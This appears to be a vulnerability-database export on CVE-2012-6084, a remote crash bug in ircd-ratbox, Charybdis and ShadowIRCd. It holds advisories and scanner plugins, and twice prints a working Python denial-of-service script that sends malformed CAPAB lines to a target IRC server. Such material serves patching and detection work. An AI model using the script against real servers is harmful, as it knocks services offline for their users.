value:\"Gentoo Linux Local Security Checks GLSA 201405-21\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"net-irc/charybdis\", unaffected: make_list(\"ge 3.4.2\"), vulnerable: make_list(\"lt 3.4.2\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"net-irc/shadowircd\", unaffected: make_list(\"ge 6.3.3\"), vulnerable: make_list(\"lt 6.3.3\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "zdt": [{"lastseen": "2018-01-01T20:58:45", "edition": 2, "description": "This exploit demonstrates a remotely trigger-able crash in ircd-ratbox version 2.0. It affects Shadowircd version 6.3.3 and Charybdis version 3.4.2.", "published": "2013-01-06T00:00:00", "type": "zdt", "title": "Ratbox IRCd Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6084"], "modified": "2013-01-06T00:00:00", "id": "1337DAY-ID-20103", "href": "https://0day.today/exploit/description/20103", "sourceData": "#!/usr/bin/python3\r\n###################################################################################\r\n#\r\n# _ _ .__ .__ \r\n# __| || |_| | ____ ____ |__| ____ ____ \r\n# \\ __ / | _/ __ \\ / ___\\| |/ _ \\ / \\ \r\n# | || || |_\\ ___// /_/ > ( <_> ) | \\ http://www.zempirians.com\r\n# /_ ~~ _\\____/\\___ >___ /|__|\\____/|___| /\r\n# |_||_| \\/_____/ \\/\r\n#\r\n# 00100011 01101100 01100101 01100111 01101001 01101111 01101110\r\n#\r\n# Provided by: UberLame, Aph3x, Apetrick, O_O\r\n#\r\n###################################################################################\r\n#\r\n# -=[ SHADOWIRCD 6.3.3 - Running vulnerable m_capab.c ] =-\r\n#\r\n# [P]roof [o]f [C]oncept, Null Point Reference, Denial of Service\r\n#\r\n#\r\n###################################################################################\r\n# -=[ EXPLOIT ]=-\r\n#\r\n# Now that a patch has been secured we are releasing a proof of concept to test your\r\n# ircd against this vulnerability. This exploit was designed to work against\r\n# Shadowircd 6.3.3 running the following vulnerable code:\r\n#\r\n# +VULNERABLE+\r\n# ../shadowircd/modules/m_capab.c - LINE(40)\r\n# {{mr_capab, 0}, mg_ignore, mg_ignore, mg_ignore, mg_ignore, mg_ignore}\r\n#\r\n# -=[ SUMMARY ]=-\r\n#\r\n# All versions of Charybdis are vulnerable to a remotely-triggered crash bug\r\n# caused by code originating from ircd-ratbox 2.0. (Incidentally, this means all\r\n# versions since ircd-ratbox 2.0 are also vulnerable.)\r\n# \r\n# The bug has to do with server capability negotiation. A malformed request will\r\n# trigger a crash due to invalid assumptions.\r\n#\r\n# -=[ PATCH ]=-\r\n#\r\n# January 1, 2013 - 12:55 PM GMT-6\r\n# \r\n# Charybdis 3.4.2, ShadowIRCd 6.3.3 and Ratbox 3.0.8 have been released with an\r\n# integrated patch to resolve this issue. All admins should upgrade immediately.\r\n#\r\n# -=[ REFERENCE ]=-\r\n#\r\n# http://www.cvedetails.com/cve/CVE-2012-6084/\r\n#\r\n###################################################################################\r\n# Ohai, I Can Has Moar Cycles? <33\r\n#\r\n# Eg: ./<file>.py -t <target> -p <port>\r\n###################################################################################\r\n\r\nfrom argparse import ArgumentParser\r\nimport socket\r\n\r\n\r\ndef own( uri, port ):\r\n sock = socket.socket()\r\n try:\r\n ret = sock.connect_ex(( uri, int( port ) ))\r\n except:\r\n print( \"\\t[-] Failed To Connect To {}\".format( uri ) )\r\n exit()\r\n\r\n print( \"\\t[+] Connected, Sending Payload To {}:{}\".format( uri, port ) )\r\n while True:\r\n try:\r\n sock.send(b\"\\x43\\x41\\x50\\x41\\x42\\x20\\x0d\\x0a\")\r\n except socket.error as se:\r\n print( '\\t[!] Owned <3' )\r\n break\r\n\r\n sock.close()\r\n\r\nif __name__ == '__main__':\r\n parser = ArgumentParser( description='m_capab DOS PoC, We Can Has Moar Cycles?' )\r\n\r\n parser.add_argument( '-t', '--target', dest='target', default='localhost', help='IRCD Address To Target' )\r\n parser.add_argument( '-p', '--port', dest='port', default=6667, help='IRCD Port To Target' )\r\n\r\n args = parser.parse_args()\r\n\r\n own( args.target, args.port )\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/20103"}], "gentoo": [{"lastseen": "2016-09-06T19:46:14", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6084"], "description": "### Background\n\nCharybdis is the Atheme Project\u2019s IRC daemon based on ratbox. ShadowIRCd is an IRC daemon based on Charybdis that adds several useful features. \n\n### Description\n\nA vulnerability has been discovered in Charybdis and ShadowIRCd. Please review the CVE identifier referenced below for details. \n\n### Impact\n\nA remote attacker may be able to cause a Denial of Service condition.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Charybdis users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-irc/charybdis-3.4.2\"\n \n\nAll ShadowIRCd users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-irc/shadowircd-6.3.3\"", "edition": 1, "modified": "2014-05-18T00:00:00", "published": "2014-05-18T00:00:00", "id": "GLSA-201405-21", "href": "https://security.gentoo.org/glsa/201405-21", "type": "gentoo", "title": "Charybdis, ShadowIRCd: Denial of Service", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "cvelist": ["CVE-2012-6084"], "description": "Crash with assert() on connection initialization.", "edition": 1, "modified": "2013-01-27T00:00:00", "published": "2013-01-27T00:00:00", "id": "SECURITYVULNS:VULN:12843", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12843", "title": "ircd-ratbox / Charybdis DoS", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "cvelist": ["CVE-2012-6084"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2612-1 security@debian.org\r\nhttp://www.debian.org/security/ Moritz Muehlenhoff\r\nJanuary 24, 2013 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : ircd-ratbox\r\nVulnerability : programming error\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE ID : CVE-2012-6084\r\n\r\nIt was discovered that a bug in the server capability negotiation code of\r\nircd-ratbox could result in denial of service.\r\n\r\nFor the stable distribution (squeeze), this problem has been fixed in\r\nversion 3.0.6.dfsg-2squeeze1.\r\n\r\nFor the testing distribution (wheezy), this problem has been fixed in\r\nversion 3.0.7.dfsg-3.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 3.0.7.dfsg-3.\r\n\r\nWe recommend that you upgrade your ircd-ratbox packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niEYEARECAAYFAlEBqQcACgkQXm3vHE4uylqiNQCeMoOg3cwLxuUxFMx4if6HRZ5n\r\nQ1UAoIZ5vDAHxoyDGAx2oY2q++Dc4qNV\r\n=O+2l\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2013-01-27T00:00:00", "published": "2013-01-27T00:00:00", "id": "SECURITYVULNS:DOC:28972", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28972", "title": "[SECURITY] [DSA 2612-1] ircd-ratbox security update", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-07T10:55:45", "description": "The remote host is affected by the vulnerability described in GLSA-201405-21\n(Charybdis, ShadowIRCd: Denial of Service)\n\n A vulnerability has been discovered in Charybdis and ShadowIRCd. Please\n review the CVE identifier referenced below for details.\n \nImpact :\n\n A remote attacker may be able to cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 21, "published": "2014-05-19T00:00:00", "title": "GLSA-201405-21 : Charybdis, ShadowIRCd: Denial of Service", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6084"], "modified": "2014-05-19T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:charybdis", "p-cpe:/a:gentoo:linux:shadowircd", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201405-21.NASL", "href": "https://www.tenable.com/plugins/nessus/74063", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201405-21.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74063);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-6084\");\n script_bugtraq_id(57085);\n script_xref(name:\"GLSA\", value:\"201405-21\");\n\n script_name(english:\"GLSA-201405-21 : Charybdis, ShadowIRCd: Denial of Service\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201405-21\n(Charybdis, ShadowIRCd: Denial of Service)\n\n A vulnerability has been discovered in Charybdis and ShadowIRCd. Please\n review the CVE identifier referenced below for details.\n \nImpact :\n\n A remote attacker may be able to cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201405-21\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Charybdis users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-irc/charybdis-3.4.2'\n All ShadowIRCd users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-irc/shadowircd-6.3.3'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:charybdis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:shadowircd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-irc/shadowircd\", unaffected:make_list(\"ge 6.3.3\"), vulnerable:make_list(\"lt 6.3.3\"))) flag++;\nif (qpkg_check(package:\"net-irc/charybdis\", unaffected:make_list(\"ge 3.4.2\"), vulnerable:make_list(\"lt 3.4.2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Charybdis / ShadowIRCd\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T09:47:46", "description": "It was discovered that a bug in the server capability negotiation code\nof ircd-ratbox could result in denial of service.", "edition": 16, "published": "2013-01-25T00:00:00", "title": "Debian DSA-2612-2 : ircd-ratbox - programming error", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6084"], "modified": "2013-01-25T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:ircd-ratbox"], "id": "DEBIAN_DSA-2612.NASL", "href": "https://www.tenable.com/plugins/nessus/64082", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2612. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64082);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-6084\");\n script_bugtraq_id(57085);\n script_xref(name:\"DSA\", value:\"2612\");\n\n script_name(english:\"Debian DSA-2612-2 : ircd-ratbox - programming error\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that a bug in the server capability negotiation code\nof ircd-ratbox could result in denial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/ircd-ratbox\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2013/dsa-2612\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the ircd-ratbox packages.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 3.0.6.dfsg-2+squeeze1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ircd-ratbox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"ircd-ratbox\", reference:\"3.0.6.dfsg-2+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"ircd-ratbox-dbg\", reference:\"3.0.6.dfsg-2+squeeze1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-03-01T03:32:32", "description": "The remote host is running a version of ShadowIRCd that is affected by\na denial of service (DoS) vulnerability. An issue exists in the 'CAPAB'\nmodule in 'm_capab.c' that causes servers to improperly handle\nnegotiation handshakes. \n\nAn unauthenticated, remote attacker could exploit this issue with a\nspecially crafted request, impacting the availability of the service.", "edition": 25, "published": "2013-03-11T00:00:00", "title": "ShadowIRCd m_capab.c Denial of Service", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6084"], "modified": "2021-03-02T00:00:00", "cpe": [], "id": "IRCD_SHADOWIRCD_CAPAB_DOS.NASL", "href": "https://www.tenable.com/plugins/nessus/65198", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65198);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/27\");\n\n script_cve_id(\"CVE-2012-6084\");\n script_bugtraq_id(57085);\n\n script_name(english:\"ShadowIRCd m_capab.c Denial of Service\");\n script_summary(english:\"Checks the version of the remote ShadowIRCd\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote chat server is affected by a denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of ShadowIRCd that is affected by\na denial of service (DoS) vulnerability. An issue exists in the 'CAPAB'\nmodule in 'm_capab.c' that causes servers to improperly handle\nnegotiation handshakes. \n\nAn unauthenticated, remote attacker could exploit this issue with a\nspecially crafted request, impacting the availability of the service.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://rabbit.dereferenced.org/~nenolod/ASA-2012-12-31.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ShadowIRCd 6.3.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ircd.nasl\");\n script_require_ports(\"Services/irc\", 6667);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nappname = \"ShadowIRCd\";\n\nport = get_service(svc:\"irc\", default:6667, exit_on_fail:TRUE);\n\nbanner = get_kb_item_or_exit(\"irc/banner/\"+port);\nif (\"shadowircd\" >!< banner) audit(AUDIT_NOT_DETECT, appname, port);\n\nversion = ereg_replace(string:banner, pattern:\": *[^ ]+ +[0-9]+ +[a-zA-Z0-9]+ +([^ ]+) +[^ ]+ *:(.*)\", replace:\"\\1 \\2\");\npattern = \"shadowircd-?(([0-9\\.]+-?([0-9]+)?)(|-?dev\\d?|-?rc\\d?)?)\\(\";\nmatch = eregmatch(pattern:pattern, string:version);\nif (isnull(match)) exit(1, \"Failed to extract the version of \"+appname+\" listening on port \"+port+\".\");\nfull_ver = match[1];\n\nfixed = '6.3.3';\nif (full_ver =~ \"^([0-5]\\.|6\\.[0-2]\\.|6\\.3\\.[0-2]($|[^0-9])|6\\.3\\.3[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + chomp(banner) +\n '\\n Installed version : ' + full_ver +\n '\\n Fixed version : ' + fixed + '\\n';\n security_warning(port:port,extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, appname, port, full_ver);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-03-01T03:32:32", "description": "The remote host is running a version of ircd-ratbox that is affected by\na denial of service (DoS) vulnerability. An issue exists in the 'CAPAB'\nmodule in 'm_capab.c' that causes servers to improperly handle\nnegotiation handshakes. \n\nAn unauthenticated, remote attacker could exploit this issue with a\nspecially crafted request, impacting the availability of the service.", "edition": 26, "published": "2013-03-11T00:00:00", "title": "ircd-ratbox m_capab.c Denial of Service", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6084"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:ratbox:ircd-ratbox"], "id": "IRCD_RATBOX_CAPAB_DOS.NASL", "href": "https://www.tenable.com/plugins/nessus/65197", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65197);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/27\");\n\n script_cve_id(\"CVE-2012-6084\");\n script_bugtraq_id(57085);\n\n script_name(english:\"ircd-ratbox m_capab.c Denial of Service\");\n script_summary(english:\"Checks the version of the remote ircd-ratbox\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote chat server is affected by a denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of ircd-ratbox that is affected by\na denial of service (DoS) vulnerability. An issue exists in the 'CAPAB'\nmodule in 'm_capab.c' that causes servers to improperly handle\nnegotiation handshakes. \n\nAn unauthenticated, remote attacker could exploit this issue with a\nspecially crafted request, impacting the availability of the service.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://rabbit.dereferenced.org/~nenolod/ASA-2012-12-31.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ircd-ratbox 3.0.8 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/11\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ratbox:ircd-ratbox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ircd.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/irc\", 6667);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nappname = \"ircd-ratbox\";\n\nport = get_service(svc:\"irc\", default:6667, exit_on_fail:TRUE);\n\nbanner = get_kb_item_or_exit(\"irc/banner/\"+port);\nif (\"ircd-ratbox\" >!< banner) audit(AUDIT_NOT_DETECT, appname, port);\n\nversion = ereg_replace(string:banner, pattern: \": *[^ ]+ +[0-9]+ +[a-zA-Z0-9]+ +([^ ]+) +[^ ]+ *:(.*)\", replace: \"\\1 \\2\");\npattern = \"ircd-ratbox-?(([0-9\\.]+-?([0-9]+)?)(|-?dev\\d?|-?rc\\d?)?)\\(\";\nmatch = eregmatch(pattern:pattern, string:version);\nif (isnull(match)) exit(1, \"Failed to extract the version of \"+appname+\" listening on port \"+port+\".\");\nfull_ver = match[1];\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nfixed = '3.0.8';\nif (full_ver =~ \"^(2\\.|3\\.0\\.[0-7]($|[^0-9])|3\\.0\\.8[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + chomp(banner) +\n '\\n Installed version : ' + full_ver +\n '\\n Fixed version : ' + fixed + '\\n';\n security_warning(port:port,extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, appname, port, full_ver);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:49", "description": "", "published": "2013-01-04T00:00:00", "type": "packetstorm", "title": "Ratbox IRCd Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6084"], "modified": "2013-01-04T00:00:00", "id": "PACKETSTORM:119238", "href": "https://packetstormsecurity.com/files/119238/Ratbox-IRCd-Denial-Of-Service.html", "sourceData": "`#!/usr/bin/python3 \n################################################################################### \n# \n# _ _ .__ .__ \n# __| || |_| | ____ ____ |__| ____ ____ \n# \\ __ / | _/ __ \\ / ___\\| |/ _ \\ / \\ \n# | || || |_\\ ___// /_/ > ( <_> ) | \\ http://www.zempirians.com \n# /_ ~~ _\\____/\\___ >___ /|__|\\____/|___| / \n# |_||_| \\/_____/ \\/ \n# \n# 00100011 01101100 01100101 01100111 01101001 01101111 01101110 \n# \n# Provided by: UberLame, Aph3x, Apetrick, O_O \n# \n################################################################################### \n# \n# -=[ SHADOWIRCD 6.3.3 - Running vulnerable m_capab.c ] =- \n# \n# [P]roof [o]f [C]oncept, Null Point Reference, Denial of Service \n# \n# \n################################################################################### \n# -=[ EXPLOIT ]=- \n# \n# Now that a patch has been secured we are releasing a proof of concept to test your \n# ircd against this vulnerability. This exploit was designed to work against \n# Shadowircd 6.3.3 running the following vulnerable code: \n# \n# +VULNERABLE+ \n# ../shadowircd/modules/m_capab.c - LINE(40) \n# {{mr_capab, 0}, mg_ignore, mg_ignore, mg_ignore, mg_ignore, mg_ignore} \n# \n# -=[ SUMMARY ]=- \n# \n# All versions of Charybdis are vulnerable to a remotely-triggered crash bug \n# caused by code originating from ircd-ratbox 2.0. (Incidentally, this means all \n# versions since ircd-ratbox 2.0 are also vulnerable.) \n# \n# The bug has to do with server capability negotiation. A malformed request will \n# trigger a crash due to invalid assumptions. \n# \n# -=[ PATCH ]=- \n# \n# January 1, 2013 - 12:55 PM GMT-6 \n# \n# Charybdis 3.4.2, ShadowIRCd 6.3.3 and Ratbox 3.0.8 have been released with an \n# integrated patch to resolve this issue. All admins should upgrade immediately. \n# \n# -=[ REFERENCE ]=- \n# \n# http://www.cvedetails.com/cve/CVE-2012-6084/ \n# \n################################################################################### \n# Ohai, I Can Has Moar Cycles? <33 \n# \n# Eg: ./<file>.py -t <target> -p <port> \n################################################################################### \n \nfrom argparse import ArgumentParser \nimport socket \n \n \ndef own( uri, port ): \nsock = socket.socket() \ntry: \nret = sock.connect_ex(( uri, int( port ) )) \nexcept: \nprint( \"\\t[-] Failed To Connect To {}\".format( uri ) ) \nexit() \n \nprint( \"\\t[+] Connected, Sending Payload To {}:{}\".format( uri, port ) ) \nwhile True: \ntry: \nsock.send(b\"\\x43\\x41\\x50\\x41\\x42\\x20\\x0d\\x0a\") \nexcept socket.error as se: \nprint( '\\t[!] Owned <3' ) \nbreak \n \nsock.close() \n \nif __name__ == '__main__': \nparser = ArgumentParser( description='m_capab DOS PoC, We Can Has Moar Cycles?' ) \n \nparser.add_argument( '-t', '--target', dest='target', default='localhost', help='IRCD Address To Target' ) \nparser.add_argument( '-p', '--port', dest='port', default=6667, help='IRCD Port To Target' ) \n \nargs = parser.parse_args() \n \nown( args.target, args.port ) \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/119238/rb_capab.py.txt"}], "debian": [{"lastseen": "2020-11-11T13:21:59", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6084"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2612-1 security@debian.org\nhttp://www.debian.org/security/ Moritz 